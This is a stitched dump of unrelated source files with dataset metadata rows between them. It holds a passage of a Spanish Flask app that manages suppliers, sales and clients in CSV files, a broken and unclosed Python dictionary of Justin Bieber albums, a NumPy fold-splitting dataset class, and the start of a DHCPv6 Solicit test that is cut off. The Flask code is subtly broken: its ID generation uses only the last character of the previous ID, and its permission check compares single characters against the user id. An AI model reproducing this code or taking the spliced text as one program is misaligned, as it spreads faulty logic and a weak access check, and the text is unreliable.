with open(os.getcwd()+'/Python3_SGE/datos/listaProveedors.csv', 'r', encoding="ISO-8859-15") as inp, open(os.getcwd()+'/Python3_SGE/datos/new.csv', 'w', encoding="ISO-8859-15") as out:
writer = csv.DictWriter(out, dialect='unix', delimiter=";", quotechar=";",
fieldnames =("ID", "NOMBRE", "DIRECCION", "TELEFONO", "CONTROLES") , quoting=csv.QUOTE_MINIMAL)
writer.writeheader()
for rowacp in csv.DictReader(inp, dialect='unix', delimiter=";"):
if rowacp["ID"] == request.form['idProveedor']: #Cambiamos los datos del elemto seleccionado(id) a los nuevos datos
rowacp['NOMBRE'] = request.form['nProveedor']
rowacp['DIRECCION'] = request.form['cProveedor']
rowacp['TELEFONO'] = request.form['tProveedor']
rowacp = {'ID': rowacp['ID'], 'NOMBRE': rowacp['NOMBRE'], 'DIRECCION': rowacp['DIRECCION'], 'TELEFONO': rowacp['TELEFONO'], 'CONTROLES': rowacp['CONTROLES']}
#Añadimos esos datos al rowacp
writer.writerow(rowacp) #Añadimos los datos el archivo
os.remove(os.getcwd()+'/Python3_SGE/datos/listaProveedors.csv')
os.rename(os.getcwd()+'/Python3_SGE/datos/new.csv', os.getcwd()+'/Python3_SGE/datos/listaProveedors.csv')
return json.dumps(1);
@app.route('/ventas.html')
def ventas():
if 'loginC' in session:
if session['loginC']:
valido = False
with open(os.getcwd()+'/Python3_SGE/datos/listaDepartamentos.csv', 'r', encoding="ISO-8859-15") as File:
reader = csv.reader(File, delimiter=';', quotechar=';',
quoting=csv.QUOTE_MINIMAL)
for row in reader: #Comprobamos si el usuario logueado tiene permisos para usar este modulo
if row[0] == "3":
for i in row[2]:
if i == session['idUser']:
valido = True
if valido:
return render_template('ventas.html')
else:
return render_template('inicio.html')
else:
return render_template('index.html')
else:
return render_template('index.html')
@app.route('/cargarVentas', methods=['POST'])
def cargarVentas():
listaDatos = []
with open(os.getcwd()+'/Python3_SGE/datos/listaVentas.csv', 'r', encoding="ISO-8859-15") as lc:
readerlc = csv.reader(lc, delimiter=';', quotechar=';',
quoting=csv.QUOTE_MINIMAL)
next(readerlc)
index = 0 #Cantidad de elementos que tiene el archivo listaCompra.csv
borrarP = 2 #Posicion en la que borrar el id del proveedor
borrarI = 1 #Posicion en la que borrar el id del invenario
for rowlc in readerlc:
datos = []
for i in rowlc:
datos.append(i)
index += 1
if index == 7:
index = 0
if index == 2:
with open(os.getcwd()+'/Python3_SGE/datos/listaInventario.csv', 'r', encoding="ISO-8859-15") as lp:
readerlp = csv.reader(lp, delimiter=';', quotechar=';', quoting=csv.QUOTE_MINIMAL)
next(readerlp)
for rowlp in readerlp:
if i == rowlp[0]:
del datos[borrarI]
datos.append(rowlp[1])
if index == 3:
with open(os.getcwd()+'/Python3_SGE/datos/listaClientes.csv', 'r', encoding="ISO-8859-15") as lp:
readerlp = csv.reader(lp, delimiter=';', quotechar=';', quoting=csv.QUOTE_MINIMAL)
next(readerlp)
for rowlp in readerlp:
if i == rowlp[0]:
del datos[borrarP]
datos.append(rowlp[1])
listaDatos.append(datos)
return json.dumps({'datos':listaDatos})
@app.route('/selectCliente', methods=['POST'])
def selectCliente():
listaDatos = []
with open(os.getcwd()+'/Python3_SGE/datos/listaClientes.csv', 'r', encoding="ISO-8859-15") as lc:
readerlc = csv.reader(lc, delimiter=';', quotechar=';',
quoting=csv.QUOTE_MINIMAL)
next(readerlc)
for rowlc in readerlc:
datos = []
datos.append(rowlc[0])
datos.append(rowlc[1])
listaDatos.append(datos)
return json.dumps({'datos':listaDatos})
@app.route('/crearVenta', methods=['POST'])
def crearVenta():
result = []
with open(os.getcwd()+'/Python3_SGE/datos/listaVentas.csv', 'r', encoding="ISO-8859-15") as inp, open(os.getcwd()+'/Python3_SGE/datos/new.csv', 'w', encoding="ISO-8859-15") as out:
writer = csv.DictWriter(out, delimiter=";", quotechar=";",
fieldnames =("ID", "PRODUCTO", "CLIENTE", "CANTIDAD", "PRECIO", "TOTAL", "CONTROLES"), quoting=csv.QUOTE_MINIMAL)
writer.writeheader()
readercp = csv.DictReader(inp, delimiter=";") #Leer archivo viejo
for rowcp in readercp:
result.append(rowcp) #Guardamos los datos del archivo viejo en una lista
ID = 0
try:
ID = int((int(rowcp['ID'][-1]) + 1)) #Recogemos el id del ultimo elemento del archivo y le sumamos 1
except NameError:
ID = 1 #Si no hay ningun elemento en el archivo ponemos el id a 1
producto = request.form['sProductos']
cliente = request.form['sCliente']
cantidad = str(request.form['cantidadCP'])
precio = str(request.form['precioCP']) + "$"
total = str(request.form['totalCP']) + "$"
controles = '<button onclick="vender({})" class="btn btn btn-outline-warning" type="button">Vender</button><button onclick="borrar({})" class="btn btn btn-outline-danger mt-2" type="button">Borrar</button>'.format(ID, ID)
data = {'ID': ID, 'PRODUCTO': producto, "CLIENTE": cliente, "CANTIDAD": cantidad, "PRECIO": precio, "TOTAL": total, "CONTROLES": controles}
result.append(data) #Añadimos el nuevo elemento a la lista
writer.writerows(result) #Añadimos los datos de la lista en el nuevo archivo
os.remove(os.getcwd()+'/Python3_SGE/datos/listaVentas.csv')
os.rename(os.getcwd()+'/Python3_SGE/datos/new.csv', os.getcwd()+'/Python3_SGE/datos/listaVentas.csv')
return json.dumps(1);
@app.route('/borrarVenta', methods=['POST'])
def borrarVenta():
idCompra = request.form['idCompra']
with open(os.getcwd()+'/Python3_SGE/datos/listaVentas.csv', 'r', encoding="ISO-8859-15") as inp, open(os.getcwd()+'/Python3_SGE/datos/new.csv', 'w', encoding="ISO-8859-15") as out:
writer = csv.DictWriter(out, dialect='unix', delimiter=";", quotechar=";",
fieldnames =("ID", "PRODUCTO", "CLIENTE", "CANTIDAD", "PRECIO", "TOTAL", "CONTROLES") , quoting=csv.QUOTE_MINIMAL)
writer.writeheader() #Evitamos borrar los titulos (fieldnames)
for rowbp in csv.DictReader(inp, dialect='unix', delimiter=";"):
if rowbp["ID"] != idCompra: #Creamos el nuevo archivo con todos los datos menos la fila con el id devuelto
writer.writerow(rowbp)
os.remove(os.getcwd()+'/Python3_SGE/datos/listaVentas.csv') #Removemos el anterior archivo
os.rename(os.getcwd()+'/Python3_SGE/datos/new.csv', os.getcwd()+'/Python3_SGE/datos/listaVentas.csv') #Cambiamos el nombre del nuevo archivo al nombre del anterior
return json.dumps(1);
@app.route('/realizarVenta', methods=['POST'])
def realizarVenta():
ridVenta = request.form['idVenta']
rproducto = ""
rcliente = ""
rcantidad = ""
rprecio = ""
rtotal = ""
rproductoNombre = ""
now = datetime.datetime.now()
with open(os.getcwd()+'/Python3_SGE/datos/listaVentas.csv', 'r', encoding="ISO-8859-15") as inp:
for rowvp in csv.DictReader(inp, delimiter=";"):
if rowvp["ID"] == ridVenta:
rproducto = rowvp['PRODUCTO']
rcliente = rowvp['CLIENTE']
rcantidad = rowvp['CANTIDAD']
rprecio = rowvp['PRECIO']
rtotal = rowvp['TOTAL']
with open(os.getcwd()+'/Python3_SGE/datos/listaInventario.csv', 'r', encoding="ISO-8859-15") as inp:
for rowvp in csv.DictReader(inp, delimiter=";"):
if rowvp["ID"] == rproducto:
rproductoNombre = rowvp['NOMBRE']
result = []
with open(os.getcwd()+'/Python3_SGE/datos/listaInventario.csv', 'r', encoding="ISO-8859-15") as inp, open(os.getcwd()+'/Python3_SGE/datos/new.csv', 'w', encoding="ISO-8859-15") as out:
writer = csv.DictWriter(out, delimiter=";", quotechar=";",
fieldnames =("ID", "NOMBRE", "TIPO", "CANTIDAD", "PRECIO_COMPRA", "PRECIO_VENTA", "CONTROLES") , quoting=csv.QUOTE_MINIMAL)
writer.writeheader()
for rowacp in csv.DictReader(inp, delimiter=";"):
if rowacp["ID"] == rproducto: #Cambiamos los datos del elemto seleccionado(id) a los nuevos datos
rowacp['CANTIDAD'] = int(rowacp['CANTIDAD']) - int(rcantidad)
rowacp = {'ID': rowacp['ID'], 'NOMBRE': rowacp['NOMBRE'], 'TIPO': rowacp['TIPO'], 'CANTIDAD': rowacp['CANTIDAD'], 'PRECIO_COMPRA': rowacp['PRECIO_COMPRA'], 'PRECIO_VENTA': rowacp['PRECIO_VENTA'], 'CONTROLES': rowacp['CONTROLES']}
#Añadimos esos datos al rowacp
writer.writerow(rowacp) #Añadimos los datos el archivo
os.remove(os.getcwd()+'/Python3_SGE/datos/listaInventario.csv')
os.rename(os.getcwd()+'/Python3_SGE/datos/new.csv', os.getcwd()+'/Python3_SGE/datos/listaInventario.csv')
with open(os.getcwd()+'/Python3_SGE/datos/listaVentas.csv', 'r', encoding="ISO-8859-15") as inp, open(os.getcwd()+'/Python3_SGE/datos/new.csv', 'w', encoding="ISO-8859-15") as out:
writer = csv.DictWriter(out, delimiter=";", quotechar=";",
fieldnames =("ID", "PRODUCTO", "CLIENTE", "CANTIDAD", "PRECIO", "TOTAL", "CONTROLES") , quoting=csv.QUOTE_MINIMAL)
writer.writeheader() #Evitamos borrar los titulos (fieldnames)
for rowbp in csv.DictReader(inp, delimiter=";"):
if rowbp["ID"] != ridVenta: #Creamos el nuevo archivo con todos los datos menos la fila con el id devuelto
writer.writerow(rowbp)
os.remove(os.getcwd()+'/Python3_SGE/datos/listaVentas.csv') #Removemos el anterior archivo
os.rename(os.getcwd()+'/Python3_SGE/datos/new.csv', os.getcwd()+'/Python3_SGE/datos/listaVentas.csv')
return json.dumps(1);
@app.route('/cliente.html')
def cliente():
if 'loginC' in session:
if session['loginC']:
valido = False
with open(os.getcwd()+'/Python3_SGE/datos/listaDepartamentos.csv', 'r', encoding="ISO-8859-15") as File:
reader = csv.reader(File, delimiter=';', quotechar=';',
quoting=csv.QUOTE_MINIMAL)
for row in reader: #Comprobamos si el usuario logueado tiene permisos para usar este modulo
if row[0] == "3":
for i in row[2]:
if i == session['idUser']:
valido = True
if valido:
return render_template('cliente.html')
else:
return render_template('inicio.html')
else:
return render_template('index.html')
else:
return render_template('index.html')
@app.route('/cargarClientes', methods=['POST'])
def cargarClientes():
listaDatos = []
with open(os.getcwd()+'/Python3_SGE/datos/listaClientes.csv', 'r', encoding="ISO-8859-15") as lc:
readerlc = csv.reader(lc, delimiter=';', quotechar=';',
quoting=csv.QUOTE_MINIMAL)
next(readerlc)
index = 0 #Cantidad de elementos que tiene el archivo listaCompra.csv
borrarP = 2 #Posicion en la que borrar el id del proveedor
borrarI = 1 #Posicion en la que borrar el id del invenario
for rowlc in readerlc:
datos = []
for i in rowlc:
datos.append(i)
listaDatos.append(datos)
return json.dumps({'datos':listaDatos})
@app.route('/newCliente', methods=['POST'])
def newCliente():
result = []
with open(os.getcwd()+'/Python3_SGE/datos/listaClientes.csv', 'r', encoding="ISO-8859-15") as inp, open(os.getcwd()+'/Python3_SGE/datos/new.csv', 'w', encoding="ISO-8859-15") as out:
writer = csv.DictWriter(out, dialect='unix', delimiter=";", quotechar=";",
fieldnames =("ID", "NOMBRE", "DIRECCION", "TELEFONO", "CONTROLES"), quoting=csv.QUOTE_MINIMAL)
writer.writeheader()
readercp = csv.DictReader(inp, dialect='unix', delimiter=";") #Leer archivo viejo
for rowcp in readercp:
result.append(rowcp) #Guardamos los datos del archivo viejo en una lista
ID = 0
try:
ID = int((int(rowcp['ID'][-1]) + 1)) #Recogemos el id del ultimo elemento del archivo y le sumamos 1
except NameError:
ID = 1 #Si no hay ningun elemento en el archivo ponemos el id a 1
nombre = request.form['nombreCliente']
direccion = request.form['calleCliente']
telefono = request.form['telefonoCliente']
controles = '<button onclick="modificar({})" class="btn btn btn-outline-warning" type="button">Modificar</button><button onclick="borrar({})" class="btn btn btn-outline-danger mt-2" type="button">Borrar</button>'.format(ID, ID)
data = {'ID': ID, 'NOMBRE': nombre, "DIRECCION": direccion, "TELEFONO": telefono, "CONTROLES": controles}
result.append(data) #Añadimos el nuevo elemento a la lista
writer.writerows(result) #Añadimos los datos de la lista en el nuevo archivo
os.remove(os.getcwd()+'/Python3_SGE/datos/listaClientes.csv')
os.rename(os.getcwd()+'/Python3_SGE/datos/new.csv', os.getcwd()+'/Python3_SGE/datos/listaClientes.csv')
return json.dumps(1);
@app.route('/borrarCliente', methods=['POST'])
def borrarCliente():
idCliente = request.form['idCliente']
with open(os.getcwd()+'/Python3_SGE/datos/listaClientes.csv', 'r', encoding="ISO-8859-15") as inp, open(os.getcwd()+'/Python3_SGE/datos/new.csv', 'w', encoding="ISO-8859-15") as out:
writer = csv.DictWriter(out, dialect='unix', delimiter=";", quotechar=";",
fieldnames =("ID", "NOMBRE", "DIRECCION", "TELEFONO", "CONTROLES") , quoting=csv.QUOTE_MINIMAL)
writer.writeheader() #Evitamos borrar los titulos (fieldnames)
for rowbp in csv.DictReader(inp, dialect='unix', delimiter=";"):
if rowbp["ID"] != idCliente: #Creamos el nuevo archivo con todos los datos menos la fila con el id devuelto
writer.writerow(rowbp)
os.remove(os.getcwd()+'/Python3_SGE/datos/listaClientes.csv') #Removemos el anterior archivo
os.rename(os.getcwd()+'/Python3_SGE/datos/new.csv', os.getcwd()+'/Python3_SGE/datos/listaClientes.csv') #Cambiamos el nombre del nuevo archivo al nombre del anterior
return json.dumps(1);
@app.route('/verCliente', methods=['POST'])
def verCliente():
idCliente = request.form['idCliente']
datosP = []
with open(os.getcwd()+'/Python3_SGE/datos/listaClientes.csv', 'r', encoding="ISO-8859-15") as inp:
for rowvp in csv.DictReader(inp, dialect='unix', delimiter=";"):
if rowvp["ID"] == idCliente: #Añadimos los datos del elemento seleccionado(id) a la lista
datosP.append(rowvp['ID'])
datosP.append(rowvp['NOMBRE'])
datosP.append(rowvp['DIRECCION'])
datosP.append(rowvp['TELEFONO'])
return json.dumps({'datos':datosP}) #Devolvemos los datos en forma json
@app.route('/actualizarCliente', methods=['POST'])
def actualizarCliente():
with open(os.getcwd()+'/Python3_SGE/datos/listaClientes.csv', 'r', encoding="ISO-8859-15") as inp, open(os.getcwd()+'/Python3_SGE/datos/new.csv', 'w', encoding="ISO-8859-15") as out:
writer = csv.DictWriter(out, dialect='unix', delimiter=";", quotechar=";",
fieldnames =("ID", "NOMBRE", "DIRECCION", "TELEFONO", "CONTROLES") , quoting=csv.QUOTE_MINIMAL)
writer.writeheader()
for rowacp in csv.DictReader(inp, dialect='unix', delimiter=";"):
if rowacp["ID"] == request.form['idCliente']: #Cambiamos los datos del elemto seleccionado(id) a los nuevos datos
rowacp['NOMBRE'] = request.form['nCliente']
rowacp['DIRECCION'] = request.form['cCliente']
rowacp['TELEFONO'] = request.form['tCliente']
rowacp = {'ID': rowacp['ID'], 'NOMBRE': rowacp['NOMBRE'], 'DIRECCION': rowacp['DIRECCION'], 'TELEFONO': rowacp['TELEFONO'], 'CONTROLES': rowacp['CONTROLES']}
#Añadimos esos datos al rowacp
writer.writerow(rowacp) #Añadimos los datos el archivo
os.remove(os.getcwd()+'/Python3_SGE/datos/listaClientes.csv')
os.rename(os.getcwd()+'/Python3_SGE/datos/new.csv', os.getcwd()+'/Python3_SGE/datos/listaClientes.csv')
return json.dumps(1);
#Inicio de la aplicación.
if __name__ == "__main__":
app.run()
| 34.167492
| 233
| 0.676922
| 5,431
| 41,411
| 5.118026
| 0.060394
| 0.033674
| 0.063139
| 0.075766
| 0.853036
| 0.849978
| 0.849978
| 0.846525
| 0.839042
| 0.831163
| 0
| 0.018653
| 0.155925
| 41,411
| 1,212
| 234
| 34.167492
| 0.776563
| 0.135254
| 0
| 0.762712
| 0
| 0.006519
| 0.267574
| 0.12527
| 0
| 0
| 0
| 0.000825
| 0
| 1
| 0.050847
| false
| 0.001304
| 0.002608
| 0
| 0.139505
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
764ffb54ab7e04bdd068c3909e0d4025b5bceaf7
| 3,048
|
py
|
Python
|
Nikki_L/DataStructure1-iTunes.py
|
ArtezGDA/text-IO
|
b9ed7f2433c0eda08fb45d125ea22a5fdeaef667
|
[
"MIT"
] | null | null | null |
Nikki_L/DataStructure1-iTunes.py
|
ArtezGDA/text-IO
|
b9ed7f2433c0eda08fb45d125ea22a5fdeaef667
|
[
"MIT"
] | null | null | null |
Nikki_L/DataStructure1-iTunes.py
|
ArtezGDA/text-IO
|
b9ed7f2433c0eda08fb45d125ea22a5fdeaef667
|
[
"MIT"
] | null | null | null |
Muziek = {
'albums': [
{
'title': "Purpose",
'artist': "Justin Bieber",
'tracks': [
{
'track':"1-8",
'titel': "Mark my word",
'airdate': "2015",
'duur':"4:36"
},
{
'track':"2-8",
'titel': "Ill Show You",
'airdate': "2015",
'duur':"4:21"
},
{
'track':"3-8",
'titel': "What Do You Mean",
'airdate': "2015",
'duur':"3:58"
},
{
'track':"4-8",
'titel': "Sorry",
'airdate': "2015",
'duur':"5:40"
},
{
'track':"5-8",
'titel': "Love Yourself",
'airdate': "2015",
'duur':"3:50"
},
{
'track':"6-8",
'titel': "Company",
'airdate': "2015",
'duur':"4:30"
},
{
'track':"7-8",
'titel': "No Pressure",
'airdate': "2015",
'duur':"4:35"
},
{
'track':"8-8",
'titel': "No Sense",
'airdate': "2015",
'duur':"3:58"
}
]
},
{
'title': "Jurnals",
'artist': "Justin Bieber",
'tracks': [
{
'track':"1-6",
'titel': "Heartbreaker",
'airdate': "2014",
'duur':"3:05"
},
{
'track':"2-6",
'titel': "All That Matters",
'airdate': "2014",
'duur':"2:46"
},
{
'track':"3-6",
'titel': "Hold Tight",
'airdate': "2014",
'duur':"2:00"
},
{
'track':"4-6",
'titel': "Recovery",
'airdate': "2014",
'duur':"2:30"
},
{
'track':"5-6",
'titel': "Bad Day",
'airdate': "2014",
'duur':"2:43"
},
{
'track':"6-6",
'titel': "All Bad",
'airdate': "2014",
'duur':"4:20"
}
]
},
{
}
| 3,048
| 3,048
| 0.207677
| 169
| 3,048
| 3.745562
| 0.35503
| 0.075829
| 0.189573
| 0.101106
| 0.151659
| 0.094787
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 0.648622
| 3,048
| 1
| 3,048
| 3,048
| 0.473389
| 0
| 0
| 0.2
| 0
| 0
| 0.2204
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
769580a0c6b3c6598252a47db993516fdf0775ed
| 10,723
|
py
|
Python
|
UI/Lib/mydataset.py
|
AIandSocialGoodLab/PAWS
|
0a386ab99b98f9aba0653c16c6cfd867a47042a4
|
[
"MIT"
] | 6
|
2018-10-04T08:40:25.000Z
|
2020-09-07T21:42:10.000Z
|
UI/Lib/mydataset.py
|
AIandSocialGoodLab/PAWS
|
0a386ab99b98f9aba0653c16c6cfd867a47042a4
|
[
"MIT"
] | null | null | null |
UI/Lib/mydataset.py
|
AIandSocialGoodLab/PAWS
|
0a386ab99b98f9aba0653c16c6cfd867a47042a4
|
[
"MIT"
] | 5
|
2018-06-17T18:08:32.000Z
|
2019-10-03T01:41:52.000Z
|
import numpy as np
class DataSet(object):
def __init__(self, positive, negative, fold_num):
'''Prepare data. Several folds for pos and neg.'''
self.positive = np.array(positive)
self.negative = np.array(negative)
self.fold_num = fold_num
index = np.random.permutation(len(self.positive))
self.positive = self.positive[index]
index = np.random.permutation(len(self.negative))
self.negative = self.negative[index]
self.data_folds = []
self.label_folds = []
fold_pos_num = int(len(self.positive) / int(fold_num))
fold_neg_num = int(len(self.negative) / int(fold_num))
for i in range(fold_num):
if i == fold_num - 1:
pos = self.positive[i * fold_pos_num:]
neg = self.negative[i * fold_neg_num:]
data = np.concatenate((pos, neg), axis=0)
label = np.array([1.] * len(pos) + [0.] * len(neg))
index = np.random.permutation(len(data))
self.data_folds.append(data[index])
self.label_folds.append(label[index])
else:
pos = self.positive[i * fold_pos_num:(i + 1) * fold_pos_num]
neg = self.negative[i * fold_neg_num:(i + 1) * fold_neg_num]
data = np.concatenate((pos, neg), axis=0)
label = np.array([1.] * len(pos) + [0.] * len(neg))
index = np.random.permutation(len(data))
self.data_folds.append(data[index])
self.label_folds.append(label[index])
def update_negative(self, negative):
self.negative = np.array(negative)
index = np.random.permutation(len(self.negative))
self.negative = self.negative[index]
fold_num = self.fold_num
self.data_folds = []
self.label_folds = []
fold_pos_num = int(len(self.positive) / int(fold_num))
fold_neg_num = int(len(self.negative) / int(fold_num))
for i in range(fold_num):
if i == fold_num - 1:
pos = self.positive[i * fold_pos_num:]
neg = self.negative[i * fold_neg_num:]
data = np.concatenate((pos, neg), axis=0)
label = np.array([1.] * len(pos) + [0.] * len(neg))
index = np.random.permutation(len(data))
self.data_folds.append(data[index])
self.label_folds.append(label[index])
else:
pos = self.positive[i * fold_pos_num:(i + 1) * fold_pos_num]
neg = self.negative[i * fold_neg_num:(i + 1) * fold_neg_num]
data = np.concatenate((pos, neg), axis=0)
label = np.array([1.] * len(pos) + [0.] * len(neg))
index = np.random.permutation(len(data))
self.data_folds.append(data[index])
self.label_folds.append(label[index])
def get_train_test(self, fold_id):
data_folds_copy = list(self.data_folds)
label_folds_copy = list(self.label_folds)
test_data = data_folds_copy.pop(fold_id)
test_label = label_folds_copy.pop(fold_id)
train_data = np.concatenate(data_folds_copy, axis=0)
train_label = np.concatenate(label_folds_copy, axis=0)
return train_data, train_label, test_data, test_label
def get_train_test_upsample(self, fold_id, num):
data_folds_copy = list(self.data_folds)
label_folds_copy = list(self.label_folds)
test_data = data_folds_copy.pop(fold_id)
test_label = label_folds_copy.pop(fold_id)
train_data = np.concatenate(data_folds_copy, axis=0)
train_label = np.concatenate(label_folds_copy, axis=0)
train_data_up = []
train_label_up = []
for data, label in zip(train_data, train_label):
if label:
train_data_up += [data] * num
train_label_up += [label] * num
else:
train_data_up.append(data)
train_label_up.append(label)
train_data_up = np.array(train_data_up)
train_label_up = np.array(train_label_up)
index = np.random.permutation(len(train_label_up))
train_data_up = train_data_up[index]
train_label_up = train_label_up[index]
return train_data_up, train_label_up, test_data, test_label
def get_train_all(self):
data_folds_copy = list(self.data_folds)
label_folds_copy = list(self.label_folds)
train_data = np.concatenate(data_folds_copy, axis=0)
train_label = np.concatenate(label_folds_copy, axis=0)
return train_data, train_label
# used by make_data_pandas.py
def get_train_all_up(self, num):
data_folds_copy = list(self.data_folds)
label_folds_copy = list(self.label_folds)
train_data = np.concatenate(data_folds_copy, axis=0)
train_label = np.concatenate(label_folds_copy, axis=0)
train_data_up = []
train_label_up = []
for data, label in zip(train_data, train_label):
if label:
train_data_up += [data] * num
train_label_up += [label] * num
else:
train_data_up.append(data)
train_label_up.append(label)
train_data_up = np.array(train_data_up)
train_label_up = np.array(train_label_up)
index = np.random.permutation(len(train_label_up))
train_data_up = train_data_up[index]
train_label_up = train_label_up[index]
return train_data_up, train_label_up
def get_train_neg_traintest_pos(self, fold_id, num):
data_folds_copy = list(self.data_folds)
label_folds_copy = list(self.label_folds)
test_data1 = data_folds_copy.pop(fold_id)
test_label1 = label_folds_copy.pop(fold_id)
train_data = np.concatenate(data_folds_copy, axis=0)
train_label = np.concatenate(label_folds_copy, axis=0)
train_data_up = []
train_label_up = []
test_data = []
test_label = []
for data, label in zip(train_data, train_label):
if label:
train_data_up += [data] * num
train_label_up += [label] * num
else:
train_data_up.append(data)
train_label_up.append(label)
for data, label in zip(test_data1, test_label1):
if label:
test_data.append(data)
test_label.append(label)
else:
train_data_up.append(data)
train_label_up.append(label)
train_data_up = np.array(train_data_up)
train_label_up = np.array(train_label_up)
index = np.random.permutation(len(train_label_up))
train_data_up = train_data_up[index]
train_label_up = train_label_up[index]
return train_data_up, train_label_up, test_data, test_label
def get_train_neg_traintest_pos_smote(self, fold_id, num):
data_folds_copy = list(self.data_folds)
label_folds_copy = list(self.label_folds)
test_data1 = data_folds_copy.pop(fold_id)
test_label1 = label_folds_copy.pop(fold_id)
train_data = np.concatenate(data_folds_copy, axis=0)
train_label = np.concatenate(label_folds_copy, axis=0)
train_data_up = []
train_label_up = []
test_data = []
test_label = []
train_data_pos = []
train_label_pos = []
for data, label in zip(train_data, train_label):
if label:
train_data_pos += [data]
train_label_pos += [label]
else:
train_data_up.append(data)
train_label_up.append(label)
for data, label in zip(test_data1, test_label1):
if label:
test_data.append(data)
test_label.append(label)
else:
train_data_up.append(data)
train_label_up.append(label)
train_data_pos = np.array(train_data_pos)
train_label_pos = np.array(train_label_pos)
idx_sort = np.argsort(np.sum(np.square(
np.expand_dims(train_data_pos, 2) - np.tile(train_data_pos, (train_data_pos.shape[0], 1)).reshape(train_data_pos.shape + (train_data_pos.shape[0],))), axis=1), axis=1)
for j, (data, label) in enumerate(zip(train_data_pos, train_label_pos)):
for i in range(num):
a = np.random.uniform(0, 1)
idx = np.random.randint(len(train_data_pos))
train_data_up += [data * a +
(1 - a) * train_data_pos[idx_sort[j, idx]]]
train_label_up += [label]
train_data_up = np.array(train_data_up)
train_label_up = np.array(train_label_up)
index = np.random.permutation(len(train_label_up))
train_data_up = train_data_up[index]
train_label_up = train_label_up[index]
return train_data_up, train_label_up, test_data, test_label
def get_train_all_up_aug(self, UdataPos, num):
data_folds_copy = list(self.data_folds)
label_folds_copy = list(self.label_folds)
train_data = np.concatenate(data_folds_copy, axis=0)
train_label = np.concatenate(label_folds_copy, axis=0)
train_data_up = []
train_label_up = []
for data, label in zip(train_data, train_label):
if label:
train_data_up += [data] * num
train_label_up += [label] * num
label1 = label
else:
train_data_up.append(data)
train_label_up.append(label)
for data in UdataPos:
train_data_up += [data]
train_label_up += [label1]
train_data_up = np.array(train_data_up)
train_label_up = np.array(train_label_up)
index = np.random.permutation(len(train_label_up))
train_data_up = train_data_up[index]
train_label_up = train_label_up[index]
return train_data_up, train_label_up
# Used by dt method
def get_train_neg_traintest_pos_aug(self, cluster_ids, cluster_ids50, index, UnknownData, UnknownDataID, fold_id, num):
data_folds_copy = list(self.data_folds)
label_folds_copy = list(self.label_folds)
test_data1 = data_folds_copy.pop(fold_id)
test_label1 = label_folds_copy.pop(fold_id)
train_data = np.concatenate(data_folds_copy, axis=0)
train_label = np.concatenate(label_folds_copy, axis=0)
UdataPos = []
for i, id in enumerate(UnknownDataID.reshape(-1)):
if (id in cluster_ids[8] or id in cluster_ids[7] or id in cluster_ids[6]) and (id in cluster_ids50[7] or id in cluster_ids50[6]):
UdataPos.append(UnknownData[i:i + 1, :])
UdataPos = np.concatenate(UdataPos, 0)
print(UdataPos.shape)
train_data_up = []
train_label_up = []
test_data = []
test_label = []
for data, label in zip(train_data, train_label):
if label:
train_data_up += [data] * num
train_label_up += [label] * num
label1 = label
else:
train_data_up.append(data)
train_label_up.append(label)
for data, label in zip(test_data1, test_label1):
if label:
test_data.append(data)
test_label.append(label)
else:
train_data_up.append(data)
train_label_up.append(label)
for data in UdataPos:
train_data_up += [data]
train_label_up += [label1]
train_data_up = np.array(train_data_up)
train_label_up = np.array(train_label_up)
index = np.random.permutation(len(train_label_up))
train_data_up = train_data_up[index]
train_label_up = train_label_up[index]
return train_data_up, train_label_up, test_data, test_label
| 34.590323
| 175
| 0.675091
| 1,619
| 10,723
| 4.134651
| 0.056208
| 0.108904
| 0.105766
| 0.057365
| 0.881237
| 0.850164
| 0.83179
| 0.819689
| 0.819689
| 0.819689
| 0
| 0.008663
| 0.214119
| 10,723
| 309
| 176
| 34.702265
| 0.785689
| 0.008486
| 0
| 0.841897
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039526
| false
| 0
| 0.003953
| 0
| 0.079051
| 0.003953
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4f11f6c517f23744faf6aa3aca6c993d770d7359
| 34,077
|
py
|
Python
|
tests/dhcpv6/address_validation/test_v6_address.py
|
shawnmullaney/forge
|
aaaef0a0645f73d24666aab6a400f3604e753aac
|
[
"0BSD"
] | null | null | null |
tests/dhcpv6/address_validation/test_v6_address.py
|
shawnmullaney/forge
|
aaaef0a0645f73d24666aab6a400f3604e753aac
|
[
"0BSD"
] | null | null | null |
tests/dhcpv6/address_validation/test_v6_address.py
|
shawnmullaney/forge
|
aaaef0a0645f73d24666aab6a400f3604e753aac
|
[
"0BSD"
] | null | null | null |
"""Standard DHCPv6 address validation"""
# pylint: disable=invalid-name,line-too-long
import pytest
import references
import misc
import srv_control
import srv_msg
@pytest.mark.basic
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.unicast
def test_v6_basic_message_unicast_global_solicit():
# Server MUST discard any Solicit it receives with
# a unicast address destination
# Message details Client Server
# GLOBAL_UNICAST dest SOLICIT -->
# X ADVERTISE
# correct message SOLICIT -->
# <-- ADVERTISE
misc.test_setup()
srv_control.config_srv_subnet_with_iface('$(SERVER_IFACE)',
'$(SRV_IPV6_ADDR_GLOBAL)',
'3000::/64',
'3000::1-3000::ff')
# Server is configured with
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_requests_option('7')
srv_msg.unicast_addres('GLOBAL', None)
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
